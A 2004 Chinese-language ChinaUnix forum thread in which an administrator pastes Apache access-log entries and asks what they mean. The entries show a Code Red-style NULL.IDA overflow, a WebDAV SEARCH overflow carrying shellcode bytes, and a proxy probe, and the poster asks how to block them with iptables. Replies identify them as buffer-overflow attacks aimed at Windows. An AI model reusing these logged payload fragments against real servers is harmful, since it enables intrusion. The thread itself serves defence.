免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 1654 | 回复: 4
打印 上一主题 下一主题

不太清楚的apache日志 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2004-06-06 13:41 |只看该作者 |倒序浏览
在access_log中发现:
×.×.×.× - - [01/Jun/2004:05:20:25 +0800] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCC%u0aeb%ub890%ueac3%u77f0%u0000%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000%ue0ff%u9090=x&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\t\x90\x90\x90_\xeb\b\x90\x90\x90\xe8\xf5\xff\xff\xf
f\x8do\xf0\x8d}-\x90\x90\x90\x8b\xf7f\xb8H\x063\xc9f\x8b\xc8\xb4\x99\xfc\xac2\xc4\xaa\xe2\xfa\x14$\xec\x9f\x99\x99e\xaaP(\xb9)\xbdk7_\xdef\x99q

或者:
×.×.×.×- - [01/Jun/2004:14:26:49 +0800] "SEARCH /\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\
xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02
\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x0
2\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x

或者:

61.174.124.32 - - [01/Jun/2004:11:46:23 +0800] "GET http://dc.tickerbar.net:42857/tld/pxy.m?nc=8985757 HTTP/1.0" 404 269

请教:他们这是在干什么?
如果有危害,该怎么去防护啊`?

我做了iptables就行了吗?
如:iptables -A INPUT -s ×.×.×.×-d ×.×.×.×-p tcp --dport www -j DROP

有好多地址都是日本那过来的``

论坛徽章:
0
2 [报告]
发表于 2004-06-06 18:14 |只看该作者

不太清楚的apache日志

buffer overflow

论坛徽章:
0
3 [报告]
发表于 2004-06-07 11:34 |只看该作者

不太清楚的apache日志

[quote]原帖由 "Greenpower"]buffer overflow[/quote 发表:


请问怎么去防护?

还是系统本身就有问题`

论坛徽章:
0
4 [报告]
发表于 2004-06-07 12:59 |只看该作者

不太清楚的apache日志

楼顶的攻击记录是针对windows的

论坛徽章:
0
5 [报告]
发表于 2004-06-13 20:09 |只看该作者

不太清楚的apache日志

请问这种攻击apache该怎么去防护啊?
我做了iptables,但新的日志里面还是记录.
对系统的性能会不会有很大的影响
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP